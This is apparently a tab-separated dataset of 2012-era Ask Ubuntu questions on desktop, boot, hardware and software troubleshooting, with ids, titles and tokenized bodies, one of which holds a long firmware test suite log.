158422	adobe reader 9.5.1 - no text in tab / menus	i 'm using ubuntu 12.04 . download i used was version 9.5.1 and this was the version : adberdr9.5.1-1_i386linux_enu.deb it was downladed from the adobe website and installed it using software centre . when i hit the tab , there is no text showed . the same in the menus but no text .
158423	how can i modify unity 12.04 's power cog menu	`` system settings ... '' and the randomly chosen among many `` displays ... '' go to the same program , while i have to remember ccsm , [ dg ] conf-editor and a few others mentioned in various articles . or i must waste scarce launcher space to pin them . i would love to have them all in one space , and that would ideally be the cog menu . editing files ( preferably in ~ ) or starting commands at session start , whatever it takes is fine with me !
158429	how to resolve ambiguous key sequence ?	using basket , i get the following message : ambiguous shortcut detected the key sequence 'ctrl+1 ' is ambiguous . use 'configure shortcuts' from the 'settings ' menu to solve the ambiguity . no action will be triggered . 'ctrl+1 ' is shown next to 'to-do ' under the 'tags ' menu . if i look in 'configure shortcuts ' i do n't find ctrl+1 assigned to anything ( the tag shortcuts are n't listed at all , leading me to believe their assignment is hard coded ) . i looked under 'system > preferences > keyboard shortcuts ' and also searched through compizconfig , but did n't find anything there that might conflict . how do i resolve this keyboard shortcut issue ? i 'm guessing the particular program or key sequence is n't too important . it looks like it happens with a number of kde programs ( sadly i have n't seen a solution ) .
158433	how to swap the language before login as per the old gdm login screen ?	i used to run ubuntu 10.04 on an computer . when upgarde to 12.04 i have got a totally new login screen . i 'm lacking of the oppertumnity to easily swap the language before login i used to have in the old version . is there any possibility to get that login screen back ? an alternative is how to get the possibilty to easily swap langauge before login ? note , the computer is located in a lobby where people with different native langauge will use it . best regards bosch
158434	is there a native version of the source engine on linux ?	i 'm sick of using wine because its full of bugs and lags a lot . i want to play half-life on linux natively . i have it on my steam account . my brother says that there is a linux version . where can i get it ?
158439	wubi : how do i find the windows partition from ubuntu ?	i ran the wubi installer , and now i have both windows 7 professional and ubuntu on my laptop . when i run the laptop with ubuntu , i can not find any of the files from windows , nor can i find the windows partition .
158441	what files do i need in my home to login in to unity ?	i have replaced the generated home with my old home folder . now i can not log in to unity . ( i can login to tty1 ) how do i best fix this ? what files is needed in home to login ? i started without : .xsession file .
158444	is there a way to check if specific hardware is supported under the kernel ?	i 'm planning on building my first pc and i 've decided on an asrock z77 extreme4 motherboard . i 've searched on google , but i have n't had any luck finding whether it 's supported . is there a new list of supported hardware ? ( i have n't been able to find any recent ones ( about the 12.04 ) . ) i also , checked to find the chips used on it ( i read on a forums post that i should and then check if those chips are supposrted ) , for instance it has a broadcom bcm57781 ethernet chip , but again through google i have n't been able to find anything on that . is there a site to check for such things ? what do you suggest i do ? i 've searched about anything i can think of but found no answers . any help much appreciated . ( p.s.i tried to make the question as generic as possible-check about hardware , not check about my specific motherboard )
158446	creating widgets using gtkbuilder	i am using glade to design a box with widgets and then load these widgets into my ui at run-time . to create each box with widgets at run-time , i create a new gtkbuilder , call add_from_string passing in the text from the .ui file glade creates , and then use the object returned from get_object ( `` box1 '' ) in the ui . i know i could create the widgets with code , but for now , i 'd like to use the .ui files glade creates . it seems inefficient though to instantiate a new gtkbuilder object and the wasted window object for every box i want to create . is there a more efficient method to load .ui files without creating a new gtkwidget object and wasted window object ? thanks , vance
158447	login to tty as guest ?	i was wondering if it is possible to log into a tty session ( not the gui ) as a guest ? as far as my observation goes the guest session provided at login are served by lightdm which dynamically creates those guest accounts ( correct me if i 'm wrong ) but how would that be done in a tty login because it requires a login and a password ?
158459	how can i change the opacity of the task bar ?	well .. the question is as simple as the title . but for details .. i really like the look of the task bar when i start ubuntu when i choose from users accounts .. it is simple and has a little transparency .. i want to have these effects on my task bar all the time . how can i change the opacity and the color of the task bar ? is it themes ? ! how can i find trusted ones and how to install them ? !
158464	how can i remove icons from the application panel in gnome 3	i really dislike the look of having that icon up there . is there a way to remove it ?
158486	how do i transfer music to my iphone ?	i 'm using ubuntu 12.04 and i have a first generation iphone,16gb . the iphone is jailbroken . under 10.04 , i was able to transfer music onto the phone . i used banshee . under 12.04 , ubuntu can see the iphone and it 's file system . but ca n't transfer music . if i just plug the iphone in , rhythymbox ca n't see the iphone . banshee can see it sometimes , but ca n't see it 's music , and ca n't transfer music onto it . attempts to copy over tracks fail with the error `` mp3 format is not supported by the device and no converter was found to convert it '' if i plug in the iphone and start nautilus , nautilus can see the iphone , and gives me options for opening it : rhythymbox or a photo management application . if i then open the phone in rhythymbox , i can see the music collection . but when i attempt to copy files over , the syncing process seems to take forever . the only way to end it is to cancel the sync . afterwards , no new tracks have been added . so , how do i transfer file over to my iphone from ubuntu 12.04 ?
158492	booting from a stick drive	i am trying to boot from an usb stick . have carefully followed the instructions at the following link and successfully downloaded and installed version ubuntu 12.04 desktop : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows i used the universal-usb-installer-1.9.0.2 as instructed and choose the ubuntu 12.04 desktop option , after downloading the respective iso/zip file onto my dell laptop from the ubuntu site . also modified my bios to select the usb first as boot drive instead of hard drive . also , turned off bit blocker on my laptop and usb stick . usb stick has the setting of automatically unlock this drive on this computer . when i reboot my laptop , it first boots into a black screen ( i assume is the bios ) , but prompts saying remove disks or other media . press any key to start . i press any key and regardless the laptop boots up to windows . hence , it appears that the boot process is checking the usb first before going to the hard drive to look for it 's boot disk and starting windows 7 . is it that the usb stick is not correctly configured with ubuntu as a boot disk ? is there anything else that i need to do besides the instructions at the following link ? http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows how can i ensure that usb boot stick is configured correctly ? after running the universal-usb-installer-1.9.0.2 to `` install '' ubuntu , is there additional configuration/installation steps ? what is the first file that the bios would look for on this usb drive ? is this configured somewhere in the bios , or would it just look for a grub file or /boot dir ? the only message i get when booting is remove disks or other media . press any key to start . any and all help would be much appreciated .
158493	why do the wallpapers i put in the 'pictures folder ' never save ?	i was in the appearance settings and i added some of my own custom wallpapers . it was all good , until i went back later only to find that all of the images i have imported where gone . every time i added them , they would disappear upon reopening of the appearance settings . is there any way i can fix this ?
158500	which packing constant to use for set_child_packing ( ) in python	i want to change a child of a box 's padding ; so i am using set_child_packing on the box holding the child . i ca n't figure out what to use as the constant for for the pack_type . using pack_start from gtk2 wo n't work as using : import gtk causes an error . what do i use for the pack_type constant ? i am using python with gtk3 on ubuntu 12.04 . thanks , vance
158514	help with swap partition	( translated from spanish ) i accidentally marked a 136gb partition which has some files in it as swap space during installation . can i access these files ? can i change the partition type without having to reformat ?
158517	linux mint : enabling networkmanager at startup	i am using linux mint 13 . it is based on ubuntu , so i think i can ask here . i had problem with wireless network after upgrading the os , and figured out that networkmanager is not starting automatically on boot . currently , i can have wireless access provided that i manually type sudo /usr/sbin/networkmanager but i want this to happen automatically , and also the booting of the os is slow due to this . on boot , it displays a message saying something like `` booting without full network '' , and that is taking more time than usual . how can i make that command run automatically at boot ?
158528	help with fixing fwts errors log	here is an extract of results.log : mtrr validation . test 1 of 3 : validate the kernel mtrr iomem setup . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xc0000000 to 0xdfffffff ( pci bus 0000:00 ) has incorrect attribute write-combining . failed [ medium ] mtrrincorrectattr : test 1 , memory range 0xfee01000 to 0xffffffff ( pci bus 0000:00 ) has incorrect attribute write-protect . ==================================================================================================== test 1 of 1 : kernel log error check . kernel message : [ 0.208079 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored advice : this is not exactly a failure mode but a warning from the kernel . the _osi ( ) method has implemented a match to the 'linux ' query in the dsdt and this is redundant because the acpi driver matches onto the windows _osi strings by default . failed [ high ] klogacpierrormethodexecutionparse : test 1 , high kernel message : [ 3.512783 ] acpi error : method parse/execution failed [ \_sb_.pci0.gfx0._dod ] ( node f7425858 ) , ae_aml_package_limit ( 20110623/psparse-536 ) advice : this is a bug picked up by the kernel , but as yet , the firmware test suite has no diagnostic advice for this particular problem . found 1 unique errors in kernel log . ==================================================================================================== check if system is using latest microcode . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- can not read microcode file /usr/share/misc/intel-microcode.dat . aborted test , initialisation failed . ==================================================================================================== msr register tests . failed [ medium ] msrcpusinconsistent : test 1 , msr sysenter_esp ( 0x175 ) has 1 inconsistent values across 2 cpus for ( shift : 0 mask : 0xffffffffffffffff ) . msr cpu 0 - > 0xf7bb9c40 vs cpu 1 - > 0xf7bc7c40 failed [ medium ] msrcpusinconsistent : test 1 , msr misc_enable ( 0x1a0 ) has 1 inconsistent values across 2 cpus for ( shift : 0 mask : 0x400c51889 ) . msr cpu 0 - > 0x850088 vs cpu 1 - > 0x850089 ==================================================================================================== checks firmware has set pci express maxreadreq to a higher value on non-motherboard devices . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : check firmware settings maxreadreq for pci express devices . maxreadreq for pci : //00:00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) is low ( 128 ) [ audio device ] . maxreadreq for pci : //00:02:00.0 network controller : intel corporation pro/wireless 5100 agn [ shiloh ] network connection is low ( 128 ) [ network controller ] . failed [ low ] lowmaxreadreq : test 1 , 2 devices have low maxreadreq settings . firmware may have configured these too low . advice : the maxreadrequest size is set too low and will affect performance . it will provide excellent bus sharing at the cost of bus data transfer rates . although not a critical issue , it may be worth considering setting the maxreadrequest size to 256 or 512 to increase throughput on the pci express bus . some drivers ( for example the brocade fibre channel driver ) allow one to override the firmware settings . where possible , this bios configuration setting is worth increasing it a little more for better performance at a small reduction of bus sharing . ==================================================================================================== pcie aspm check . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 2 : pcie aspm acpi test . pcie aspm is not controlled by linux kernel . advice : bios reports that linux kernel should not modify aspm settings that bios configured . it can be intentional because hardware vendors identified some capability bugs between the motherboard and the add-on cards . test 2 of 2 : pcie aspm registers test . warning : test 2 , rp 00h:1ch.01h l0s not enabled . warning : test 2 , rp 00h:1ch.01h l1 not enabled . warning : test 2 , device 02h:00h.00h l0s not enabled . warning : test 2 , device 02h:00h.00h l1 not enabled . passed : test 2 , pcie aspm setting matched was matched . warning : test 2 , rp 00h:1ch.05h l0s not enabled . warning : test 2 , rp 00h:1ch.05h l1 not enabled . warning : test 2 , device 85h:00h.00h l0s not enabled . warning : test 2 , device 85h:00h.00h l1 not enabled . passed : test 2 , pcie aspm setting matched was matched . ==================================================================================================== extract and analyse windows management instrumentation ( wmi ) . test 1 of 2 : check windows management instrumentation in dsdt found wmi method wmaa with guid : 5fb7f034-2c63-45e9-be91-3d44e2c707e4 , instance 0x01 found wmi event , notifier id : 0x80 , guid : 95f24279-4d7b-4334-9387-accdc67ef61c , instance 0x01 passed : test 1 , guid 95f24279-4d7b-4334-9387-accdc67ef61c is handled by driver hp-wmi ( vendor : hp ) . found wmi event , notifier id : 0xa0 , guid : 2b814318-4be8-4707-9d84-a190a859b5d0 , instance 0x01 failed [ medium ] wmiunknownguid : test 1 , guid 2b814318-4be8-4707-9d84-a190a859b5d0 is unknown to the kernel , a driver may need to be implemented for this guid . advice : a wmi driver probably needs to be written for this event . it can checked for using : wmi_has_guid ( `` 2b814318-4be8-4707-9d84-a190a859b5d0 '' ) . one can install a notify handler using wmi_install_notify_handler ( `` 2b814318-4be8-4707-9d84-a190a859b5d0 '' , handler , null ) . http : //lwn.net/articles/391230 describes how to write an appropriate driver . found wmi object , object id ab , guid : 05901221-d566-11d1-b2f0-00a0c9062910 , instance 0x01 , flags : 00 found wmi method wmba with guid : 1f4c91eb-dc5c-460b-951d-c7cb9b4b8d5e , instance 0x01 found wmi object , object id bc , guid : 2d114b49-2dfb-4130-b8fe-4a3c09e75133 , instance 0x7f , flags : 00 found wmi object , object id bd , guid : 988d08e3-68f4-4c35-af3e-6a1b8106f83c , instance 0x19 , flags : 00 found wmi object , object id be , guid : 14ea9746-ce1f-4098-a0e0-7045cb4da745 , instance 0x01 , flags : 00 found wmi object , object id bf , guid : 322f2028-0f84-4901-988e-015176049e2d , instance 0x01 , flags : 00 found wmi object , object id bg , guid : 8232de3d-663d-4327-a8f4-e293adb9bf05 , instance 0x01 , flags : 00 found wmi object , object id bh , guid : 8f1f6436-9f42-42c8-badc-0e9424f20c9a , instance 0x00 , flags : 00 found wmi object , object id bi , guid : 8f1f6435-9f42-42c8-badc-0e9424f20c9a , instance 0x00 , flags : 00 found wmi method wmac with guid : 7391a661-223a-47db-a77a-7be84c60822d , instance 0x01 found wmi object , object id bj , guid : df4e63b6-3bbc-4858-9737-c74f82f821f3 , instance 0x05 , flags : 00 ==================================================================================================== disassemble dsdt to check for _osi ( `` linux '' ) . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : disassemble dsdt to check for _osi ( `` linux '' ) . this is not strictly a failure mode , it just alerts one that this has been defined in the dsdt and probably should be avoided since the linux acpi driver matches onto the windows _osi strings { if ( _osi ( `` linux '' ) ) { store ( 0x03e8 , osys ) } if ( _osi ( `` windows 2001 '' ) ) { store ( 0x07d1 , osys ) } if ( _osi ( `` windows 2001 sp1 '' ) ) { store ( 0x07d1 , osys ) } if ( _osi ( `` windows 2001 sp2 '' ) ) { store ( 0x07d2 , osys ) } if ( _osi ( `` windows 2006 '' ) ) { store ( 0x07d6 , osys ) } if ( land ( mpen , lequal ( osys , 0x07d1 ) ) ) { trap ( 0x01 , 0x48 ) } trap ( 0x03 , 0x35 ) } warning : test 1 , dsdt implements a deprecated _osi ( `` linux '' ) test . ==================================================================================================== 0 passed , 0 failed , 1 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== acpi dsdt method semantic tests . acpica exception ae_aml_infinite_loop during execution of method comp failed to install global event handler . test 22 of 93 : check _psr ( power source ) . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 22 , detected an infinite loop when evaluating method '\_sb_.ac__._psr ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . passed : test 22 , \_sb_.ac__._psr correctly acquired and released locks 16 times . test 35 of 93 : check _tmp ( thermal zone current temp ) . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 35 , detected an infinite loop when evaluating method '\_tz_.dtsz._tmp ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . passed : test 35 , \_tz_.dtsz._tmp correctly acquired and released locks 14 times . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 35 , detected an infinite loop when evaluating method '\_tz_.cpuz._tmp ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . passed : test 35 , \_tz_.cpuz._tmp correctly acquired and released locks 10 times . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 35 , detected an infinite loop when evaluating method '\_tz_.sknz._tmp ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . passed : test 35 , \_tz_.sknz._tmp correctly acquired and released locks 10 times . passed : test 35 , _tmp correctly returned sane looking value 0x00000b4c ( 289.2 degrees k ) passed : test 35 , \_tz_.batz._tmp correctly acquired and released locks 9 times . passed : test 35 , _tmp correctly returned sane looking value 0x00000aac ( 273.2 degrees k ) passed : test 35 , \_tz_.fdtz._tmp correctly acquired and released locks 7 times . test 46 of 93 : check _dis ( disable ) . failed [ medium ] methodshouldreturnnothing : test 46 , \_sb_.pci0.lpcb.sio_.com1._dis returned values , but was expected to return nothing . object returned : integer : 0x00000000 advice : this probably wo n't cause any errors , but it should be fixed as the aml code is not conforming to the expected behaviour as described in the acpi specification . failed [ medium ] methodshouldreturnnothing : test 46 , \_sb_.pci0.lpcb.sio_.lpt0._dis returned values , but was expected to return nothing . object returned : integer : 0x00000000 advice : this probably wo n't cause any errors , but it should be fixed as the aml code is not conforming to the expected behaviour as described in the acpi specification . test 61 of 93 : check _wak ( system wake ) . test _wak ( 1 ) system wake , state s1 . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 61 , detected an infinite loop when evaluating method '\_wak ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . test _wak ( 2 ) system wake , state s2 . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 61 , detected an infinite loop when evaluating method '\_wak ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . test _wak ( 3 ) system wake , state s3 . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 61 , detected an infinite loop when evaluating method '\_wak ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . test _wak ( 4 ) system wake , state s4 . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 61 , detected an infinite loop when evaluating method '\_wak ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . test _wak ( 5 ) system wake , state s5 . acpica exception ae_aml_infinite_loop during execution of method comp warning : test 61 , detected an infinite loop when evaluating method '\_wak ' . advice : this may occur because we are emulating the execution in this test environment and can not handshake with the embedded controller or jump to the bios via smis . however , the fact that aml code spins forever means that lockup conditions are not being checked for in the aml bytecode . test 87 of 93 : check _bcl ( query list of brightness control levels supported ) . package has 2 elements : 00 : integer : 0x00000000 01 : integer : 0x00000000 failed [ medium ] method_bclelementcount : test 87 , method _bcl should return a package of more than 2 integers , got just 2 . test 88 of 93 : check _bcm ( set brightness level ) . acpica exception ae_aml_package_limit during execution of method _bcm failed [ critical ] aeamlpackgelimit : test 88 , detected error 'package limit ' when evaluating '\_sb_.pci0.gfx0.dd02._bcm ' . ==================================================================================================== acpi table settings sanity checks . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 1 : check acpi tables . passed : test 1 , table apic passed . table ecdt not present to check . failed [ medium ] fadt32and64bothdefined : test 1 , fadt 32 bit firmware_control is non-zero , and x_firmware_control is also non-zero . section 5.2.9 of the acpi specification states that if the firmware_control is non-zero then x_firmware_control must be set to zero . advice : the fadt firmware_ctrl is a 32 bit pointer that points to the physical memory address of the firmware acpi control structure ( facs ) . there is also an extended 64 bit version of this , the x_firmware_ctrl pointer that also can point to the facs . section 5.2.9 of the acpi specification states that if the x_firmware_ctrl field contains a non zero value then the firmware_ctrl field *must* be zero . this error is also detected by the linux kernel . if firmware_ctrl and x_firmware_ctrl are defined , then the kernel just uses the 64 bit version of the pointer . passed : test 1 , table hpet passed . passed : test 1 , table mcfg passed . passed : test 1 , table rsdt passed . passed : test 1 , table rsdp passed . table sbst not present to check . passed : test 1 , table xsdt passed . ==================================================================================================== re-assemble dsdt and find syntax errors and warnings . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- test 1 of 2 : disassemble and reassemble dsdt failed [ high ] amlassemblererror4043 : test 1 , assembler error in line 2261 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 02258| 0x00000000 , // range minimum 02259| 0xfedfffff , // range maximum 02260| 0x00000000 , // translation offset 02261| 0x00000000 , // length | ^ | error 4043 : invalid combination of length and min/max fixed flags 02262| , , _y0e , addressrangememory , typestatic ) 02263| dwordmemory ( resourceproducer , posdecode , minfixed , maxfixed , cacheable , readwrite , 02264| 0x00000000 , // granularity ==================================================================================================== advice : ( for error # 4043 ) : this occurs if the length is zero and just one of the resource mif/maf flags are set , or the length is non-zero and resource mif/maf flags are both set . these are illegal combinations and need to be fixed . see section 6.4.3.5 address space resource descriptors of version 4.0a of the acpi specification for more details . failed [ high ] amlassemblererror4050 : test 1 , assembler error in line 2268 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 02265| 0xfee01000 , // range minimum 02266| 0xffffffff , // range maximum 02267| 0x00000000 , // translation offset 02268| 0x011fefff , // length | ^ | error 4050 : length is not equal to fixed min/max window 02269| , , , addressrangememory , typestatic ) 02270| } ) 02271| method ( _crs , 0 , serialized ) ==================================================================================================== advice : ( for error # 4050 ) : the minimum address is greater than the maximum address . this is illegal . failed [ high ] amlassemblererror1104 : test 1 , assembler error in line 8885 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 08882| method ( _dis , 0 , notserialized ) 08883| { 08884| dsod ( 0x02 ) 08885| return ( 0x00 ) | ^ | warning level 0 1104 : reserved method should not return a value ( _dis ) 08886| } 08887| 08888| method ( _srs , 1 , notserialized ) ==================================================================================================== failed [ high ] amlassemblererror1104 : test 1 , assembler error in line 9195 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 09192| method ( _dis , 0 , notserialized ) 09193| { 09194| dsod ( 0x01 ) 09195| return ( 0x00 ) | ^ | warning level 0 1104 : reserved method should not return a value ( _dis ) 09196| } 09197| 09198| method ( _srs , 1 , notserialized ) ==================================================================================================== failed [ high ] amlassemblererror1127 : test 1 , assembler error in line 9242 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 09239| createwordfield ( cres , \_sb.pci0.lpcb.sio.lpt0._crs._y21._max , max2 ) 09240| createbytefield ( cres , \_sb.pci0.lpcb.sio.lpt0._crs._y21._len , len2 ) 09241| createwordfield ( cres , \_sb.pci0.lpcb.sio.lpt0._crs._y22._int , irq0 ) 09242| createwordfield ( cres , \_sb.pci0.lpcb.sio.lpt0._crs._y23._dma , dma0 ) | ^ | warning level 0 1127 : resourcetag smaller than field ( tag : 8 bits , field : 16 bits ) 09243| if ( rlpd ) 09244| { 09245| store ( 0x00 , local0 ) ==================================================================================================== failed [ high ] amlassemblererror1128 : test 1 , assembler error in line 18682 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 18679| store ( 0x01 , index ( derefof ( index ( local0 , 0x02 ) ) , 0x01 ) ) 18680| if ( and ( wdpe , 0x40 ) ) 18681| { 18682| wait ( \_sb.bevt , 0x10 ) | ^ | warning level 0 1128 : result is not used , possible operator timeout will be missed 18683| } 18684| 18685| store ( brid , index ( derefof ( index ( local0 , 0x02 ) ) , 0x02 ) ) ==================================================================================================== advice : ( for warning level 0 # 1128 ) : the operation can possibly timeout , and hence the return value indicates an timeout error . however , because the return value is not checked this very probably indicates that the code is buggy . a possible scenario is that a mutex times out and the code attempts to access data in a critical region when it should not . this will lead to undefined behaviour . this should be fixed . table dsdt ( 0 ) reassembly : found 2 errors , 4 warnings . test 2 of 2 : disassemble and reassemble ssdt passed : test 2 , ssdt ( 0 ) reassembly , found 0 errors , 0 warnings . failed [ high ] amlassemblererror1104 : test 2 , assembler error in line 60 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00057| { 00058| store ( cpdc ( arg0 ) , local0 ) 00059| gcap ( local0 ) 00060| return ( local0 ) | ^ | warning level 0 1104 : reserved method should not return a value ( _pdc ) 00061| } 00062| 00063| method ( _osc , 4 , notserialized ) ==================================================================================================== failed [ high ] amlassemblererror1104 : test 2 , assembler error in line 174 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00171| { 00172| store ( \_pr.cpu0.cpdc ( arg0 ) , local0 ) 00173| gcap ( local0 ) 00174| return ( local0 ) | ^ | warning level 0 1104 : reserved method should not return a value ( _pdc ) 00175| } 00176| 00177| method ( _osc , 4 , notserialized ) ==================================================================================================== failed [ high ] amlassemblererror1104 : test 2 , assembler error in line 244 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00241| { 00242| store ( \_pr.cpu0.cpdc ( arg0 ) , local0 ) 00243| gcap ( local0 ) 00244| return ( local0 ) | ^ | warning level 0 1104 : reserved method should not return a value ( _pdc ) 00245| } 00246| 00247| method ( _osc , 4 , notserialized ) ==================================================================================================== failed [ high ] amlassemblererror1104 : test 2 , assembler error in line 290 line | aml source -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00287| { 00288| store ( \_pr.cpu0.cpdc ( arg0 ) , local0 ) 00289| gcap ( local0 ) 00290| return ( local0 ) | ^ | warning level 0 1104 : reserved method should not return a value ( _pdc ) 00291| } 00292| 00293| method ( _osc , 4 , notserialized ) ==================================================================================================== table ssdt ( 1 ) reassembly : found 0 errors , 4 warnings . passed : test 2 , ssdt ( 2 ) reassembly , found 0 errors , 0 warnings . passed : test 2 , ssdt ( 3 ) reassembly , found 0 errors , 0 warnings . ==================================================================================================== 3 passed , 10 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . ==================================================================================================== critical failures : 1 method test , at 1 log line : 1449 : detected error 'package limit ' when evaluating '\_sb_.pci0.gfx0.dd02._bcm ' . high failures : 11 klog test , at 1 log line : 121 : high kernel message : [ 3.512783 ] acpi error : method parse/execution failed [ \_sb_.pci0.gfx0._dod ] ( node f7425858 ) , ae_aml_package_limit ( 20110623/psparse-536 ) syntaxcheck test , at 1 log line : 1668 : assembler error in line 2261 syntaxcheck test , at 1 log line : 1687 : assembler error in line 2268 syntaxcheck test , at 1 log line : 1703 : assembler error in line 8885 syntaxcheck test , at 1 log line : 1716 : assembler error in line 9195 syntaxcheck test , at 1 log line : 1729 : assembler error in line 9242 syntaxcheck test , at 1 log line : 1742 : assembler error in line 18682 syntaxcheck test , at 1 log line : 1766 : assembler error in line 60 syntaxcheck test , at 1 log line : 1779 : assembler error in line 174 syntaxcheck test , at 1 log line : 1792 : assembler error in line 244 syntaxcheck test , at 1 log line : 1805 : assembler error in line 290 medium failures : 9 mtrr test , at 1 log line : 76 : memory range 0xc0000000 to 0xdfffffff ( pci bus 0000:00 ) has incorrect attribute write-combining . mtrr test , at 1 log line : 78 : memory range 0xfee01000 to 0xffffffff ( pci bus 0000:00 ) has incorrect attribute write-protect . msr test , at 1 log line : 165 : msr sysenter_esp ( 0x175 ) has 1 inconsistent values across 2 cpus for ( shift : 0 mask : 0xffffffffffffffff ) . msr test , at 1 log line : 173 : msr misc_enable ( 0x1a0 ) has 1 inconsistent values across 2 cpus for ( shift : 0 mask : 0x400c51889 ) . wmi test , at 1 log line : 528 : guid 2b814318-4be8-4707-9d84-a190a859b5d0 is unknown to the kernel , a driver may need to be implemented for this guid . method test , at 1 log line : 1002 : \_sb_.pci0.lpcb.sio_.com1._dis returned values , but was expected to return nothing . method test , at 1 log line : 1011 : \_sb_.pci0.lpcb.sio_.lpt0._dis returned values , but was expected to return nothing . method test , at 1 log line : 1443 : method _bcl should return a package of more than 2 integers , got just 2. acpitables test , at 1 log line : 1643 : fadt 32 bit firmware_control is non-zero , and x_firmware_control is also non-zero . se
158529	wipe 12.04/windows 7 dual boot setup and start fresh new 12.04	i have an asus u56e laptop running dual boot setup , windows 7 and 12.04 . i had windows 7 first . i was wondering what 's the easiest way possible to erase/format my drive ( 500gb ) so that it deletes ubuntu and windows 7 so i can reinstall 12.04 onto my whole drive ? does the ubuntu live cd help make this a possibility or is there something with gparted i have to tinker with ? i 've already got everything i need backed up . any help would be much appreciated .
